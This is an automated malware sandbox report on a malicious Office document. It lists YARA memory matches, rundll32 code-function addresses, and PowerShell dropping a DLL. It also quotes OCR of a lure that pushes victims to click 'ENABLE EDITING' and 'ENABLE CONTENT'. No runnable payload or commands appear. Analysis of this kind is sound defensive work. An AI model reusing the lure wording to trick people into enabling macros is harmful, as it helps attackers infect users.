Source: Yara match | File source: 00000007.00000002.2096914563.00000000001E0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 0000000A.00000002.2101765881.0000000000380000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000017.00000002.2340256128.0000000000190000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000014.00000002.2116722634.00000000001D0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000012.00000002.2114509777.0000000000220000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 0000000C.00000002.2106324425.00000000001B1000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 0000000D.00000002.2107481721.0000000000271000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 0000000A.00000002.2102126340.00000000003A1000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 0000000E.00000002.2109311078.00000000002C1000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000008.00000002.2098614058.0000000000690000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000013.00000002.2115515890.0000000000140000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 0000000F.00000002.2110449108.00000000001C1000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000017.00000002.2340299348.0000000000231000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000010.00000002.2111379658.0000000000150000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 0000000B.00000002.2104432048.0000000000211000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000011.00000002.2112781358.0000000000150000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000011.00000002.2113001666.0000000000231000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000008.00000002.2098670665.00000000006B1000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000012.00000002.2114590514.00000000002A1000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000009.00000002.2099888213.00000000001D0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 0000000B.00000002.2104402194.00000000001F0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000015.00000002.2118123404.0000000000201000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 19.2.rundll32.exe.1d0000.1.unpack, type: UNPACKEDPE
Source: Yara match | File source: 22.2.rundll32.exe.140000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 23.2.rundll32.exe.190000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 14.2.rundll32.exe.2c0000.1.unpack, type: UNPACKEDPE
Source: Yara match | File source: 21.2.rundll32.exe.1a0000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 12.2.rundll32.exe.1b0000.1.unpack, type: UNPACKEDPE
Source: Yara match | File source: 12.2.rundll32.exe.190000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 21.2.rundll32.exe.1a0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 13.2.rundll32.exe.270000.1.unpack, type: UNPACKEDPE
Source: Yara match | File source: 21.2.rundll32.exe.200000.1.unpack, type: UNPACKEDPE
Source: Yara match | File source: 12.2.rundll32.exe.190000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 9.2.rundll32.exe.1d0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 10.2.rundll32.exe.3a0000.1.unpack, type: UNPACKEDPE
Source: Yara match | File source: 20.2.rundll32.exe.1d0000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 23.2.rundll32.exe.230000.1.unpack, type: UNPACKEDPE
Source: Yara match | File source: 17.2.rundll32.exe.230000.1.unpack, type: UNPACKEDPE
Source: Yara match | File source: 9.2.rundll32.exe.1d0000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 11.2.rundll32.exe.210000.1.unpack, type: UNPACKEDPE
Source: Yara match | File source: 7.2.rundll32.exe.1e0000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 13.2.rundll32.exe.1c0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 19.2.rundll32.exe.140000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 8.2.rundll32.exe.690000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 20.2.rundll32.exe.240000.1.unpack, type: UNPACKEDPE
Source: Yara match | File source: 7.2.rundll32.exe.1e0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 10.2.rundll32.exe.380000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 18.2.rundll32.exe.220000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 14.2.rundll32.exe.200000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 15.2.rundll32.exe.1a0000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 19.2.rundll32.exe.140000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 16.2.rundll32.exe.6b0000.1.unpack, type: UNPACKEDPE
Source: Yara match | File source: 9.2.rundll32.exe.1f0000.1.unpack, type: UNPACKEDPE
Source: Yara match | File source: 16.2.rundll32.exe.150000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 15.2.rundll32.exe.1a0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 7.2.rundll32.exe.2c0000.1.unpack, type: UNPACKEDPE
Source: Yara match | File source: 15.2.rundll32.exe.1c0000.1.unpack, type: UNPACKEDPE
Source: Yara match | File source: 22.2.rundll32.exe.220000.1.unpack, type: UNPACKEDPE
Source: Yara match | File source: 18.2.rundll32.exe.220000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 8.2.rundll32.exe.6b0000.1.unpack, type: UNPACKEDPE
Source: Yara match | File source: 10.2.rundll32.exe.380000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 16.2.rundll32.exe.150000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 23.2.rundll32.exe.190000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 17.2.rundll32.exe.150000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 11.2.rundll32.exe.1f0000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 8.2.rundll32.exe.690000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 18.2.rundll32.exe.2a0000.1.unpack, type: UNPACKEDPE
Source: Yara match | File source: 17.2.rundll32.exe.150000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 20.2.rundll32.exe.1d0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 14.2.rundll32.exe.200000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 11.2.rundll32.exe.1f0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 13.2.rundll32.exe.1c0000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 22.2.rundll32.exe.140000.0.unpack, type: UNPACKEDPE
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File created: C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\E0F5C59F9FA661F6F4C50B87FEF3A15A

System Summary:

Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Source: Screenshot number: 4 | Screenshot OCR: ENABLE EDITING" and "ENABLE CONTENT" buttons to preview this document. 0 Page: I 0' ' Wo'd"
Source: Screenshot number: 4 | Screenshot OCR: DOCUMENT IS PROTECTED. I Previewing is not available for protected documents. You have to press "E
Source: Screenshot number: 4 | Screenshot OCR: protected documents. You have to press "ENABLE EDITING" and "ENABLE CONTENT" buttons to preview thi
Source: Screenshot number: 4 | Screenshot OCR: ENABLE CONTENT" buttons to preview this document. 0 Page: I 0' ' Wo'd" N@m 13 ;a 10096 G) FI
Source: Screenshot number: 8 | Screenshot OCR: ENABLE EDITING" and "ENABLE CONTENT" buttons to preview this document. . . . . '% O a S
Source: Screenshot number: 8 | Screenshot OCR: DOCUMENT IS PROTECTED. Previewing is not available for protected documents. You have to press "ENA
Source: Screenshot number: 8 | Screenshot OCR: protected documents. You have to press "ENABLE EDITING" and "ENABLE CONTENT" buttons to preview thi
Source: Screenshot number: 8 | Screenshot OCR: ENABLE CONTENT" buttons to preview this document. . . . . '% O a S
Source: Document image extraction number: 0 | Screenshot OCR: ENABLE EDITING" and "ENABLE CONTENT" buttons to preview this document.
Source: Document image extraction number: 0 | Screenshot OCR: protected documents. You have to press "ENABLE EDITING" and "ENABLE CONTENT" buttons to preview thi
Source: Document image extraction number: 0 | Screenshot OCR: ENABLE CONTENT" buttons to preview this document.
Source: Document image extraction number: 1 | Screenshot OCR: ENABLE EDITING" and "ENABLE CONTENT" buttons to preview this document.
Source: Document image extraction number: 1 | Screenshot OCR: DOCUMENT IS PROTECTED. Previewing is not available for protected documents. You have to press "ENA
Source: Document image extraction number: 1 | Screenshot OCR: protected documents. You have to press "ENABLE EDITING" and "ENABLE CONTENT" buttons to preview thi
Source: Document image extraction number: 1 | Screenshot OCR: ENABLE CONTENT" buttons to preview this document.

Powershell drops PE file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File created: C:\Users\user\Rg0646r\Q90xmrq\M8jklv4.dll

Very long command line found
Source: unknown | Process created: Commandline size = 7688
Source: unknown | Process created: Commandline size = 7597
Source: C:\Windows\System32\cmd.exe | Process created: Commandline size = 7597
Source: C:\Windows\SysWOW64\rundll32.exe | Memory allocated: 76E20000 page execute and read and write
Source: C:\Windows\SysWOW64\rundll32.exe | Memory allocated: 76D20000 page execute and read and write
Source: C:\Windows\SysWOW64\rundll32.exe | File created: C:\Windows\SysWOW64\Bjbj\
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 7_2_1000D270
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 7_2_10011EA7
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 7_2_10012750
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 7_2_10012B5C
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 7_2_1001237C
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 7_2_10012F7C
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 7_2_002C6C05
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 7_2_002C4121
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 7_2_002D4DAD
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 7_2_002DC19B
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 7_2_002C6E8A
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 7_2_002D533C
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 7_2_002CFB04
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 7_2_002C9716
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 7_2_002CE360
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 7_2_002DA7E4
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 7_2_002C83F0
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 7_2_002C4828
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 7_2_002D0C65
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 7_2_002D5060
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 7_2_002D1C79
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 7_2_002CF471
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 7_2_002C884A
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 7_2_002CD04B
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 7_2_002CC8A5
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 7_2_002DD08F
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 7_2_002CF099
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 7_2_002DA094
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 7_2_002CB0E1
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 7_2_002D68CB
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 7_2_002C792C
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 7_2_002CE924
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 7_2_002D5D36
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 7_2_002C5D0E
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 7_2_002D2513
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 7_2_002D8978
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 7_2_002DC95E
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 7_2_002C4D5F
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 7_2_002C81A0
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_002C59B8
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_002DB19F
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_002C8994
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_002D39E1
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_002C1600
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_002D3600
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_002C3618
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_002C766F
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_002CD668
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_002D2A7D
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_002D8E79
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_002C427A
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_002D7A50
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_002D72AE
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_002D0EA0
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_002C6ABA
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_002C12B6
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_002DA2EA
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_002C7AE4
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_002D9AE2
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_002CD2CE
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_002CDEC9
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_002D76D5
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_002D12D1
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_002CBB28
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_002D0705
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_002D8313
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_002D5B60
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_002D5748
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_002D3745
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_002C2746
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_002C6342
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_002CDB5B
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_002C8F55
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_002C67AC
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_002C3FAB
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_002CB3A2
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_002CFFB5
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_002DCBB0
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_002CEF80
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_002C3B97
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_002CB7F8
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_002C33F4
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_002CC3C2
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_006A4460
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_006A0065
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_006A1079
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_0069E871
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_0069C44B
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_00697C4A
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_00693C28
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_00696005
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_0069A4E1
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_006A5CCB
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_0069BCA5
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_006AC48F
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_0069E499
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_006A9494
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_006A7D78
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_006ABD5E
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_0069415F
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_00696D2C
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_00693521
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_0069DD24
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_006A5136
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_0069510E
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_006A1913
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_006A2DE1
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_006A41AD
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_006975A0
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_00694DB8
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_006AB59B
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_006AA59F
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_00697D94
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_0069CA68
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_00696A6F
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_0069367A
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_006A8279
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_006A1E7D
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_006A6E50
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_00690A00
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_006A2A00
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_006B1600
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_00692A18
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_006A96EA
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_006A8EE2
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_00696EE4
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_0069D2C9
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_0069C6CE
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_006A06D1
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_006A6AD5
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_006A66AE
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_006A02A0
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_00695EBA
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_006B12B6
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_006906B6
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_0069628A
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_0069D760
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_006A4F60
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_006A4B48
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_00695742
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_00691B46
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_006A2B45
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_0069CF5B
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_00698355
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_0069AF28
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_006A473C
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_0069FB05
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_0069EF04
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_006A7713
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_00698B16
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_006A9BE4
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_0069ABF8
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_006977F0
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_006927F4
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_0069B7C2
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_006933AB
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_00695BAC
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_0069A7A2
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_006ABFB0
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_0069F3B5
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_0069E380
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_00692F97
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001D6005
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001D3C28
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001DC44B
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001D7C4A
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001E1079
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001DE871
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001E0065
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001E4460
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001DE499
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001E9494
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001EC48F
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001DBCA5
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001E5CCB
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001DA4E1
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001E1913
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001D510E
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001E5136
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001D6D2C
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001DDD24
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001D3521
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001EBD5E
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001D415F
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001E7D78
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001EA59F
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001EB59B
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001D7D94
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001D4DB8
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001E41AD
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001D75A0
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001E2DE1
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001D2A18
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001D0A00
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001E2A00
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001F1600
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001E6E50
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001E1E7D
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001D367A
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001E8279
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001D6A6F
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001DCA68
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001D628A
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001D5EBA
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001F12B6
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001D06B6
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001E66AE
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001E02A0
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001E6AD5
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001E06D1
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001DC6CE
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001DD2C9
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001E96EA
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001D6EE4
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001E8EE2
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001D8B16
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001E7713
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001DFB05
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001DEF04
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001E473C
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001DAF28
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001DCF5B
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001D8355
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001E4B48
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001D1B46
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001E2B45
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001D5742
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001DD760
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001E4F60
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001D2F97
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001DE380
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001DF3B5
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001EBFB0
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001D5BAC
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001D33AB
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001DA7A2
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001DB7C2
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001DABF8
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001D27F4
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001D77F0
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001E9BE4
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_00383C28
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_00386005
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_00391079
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0038E871
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_00394460
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_00390065
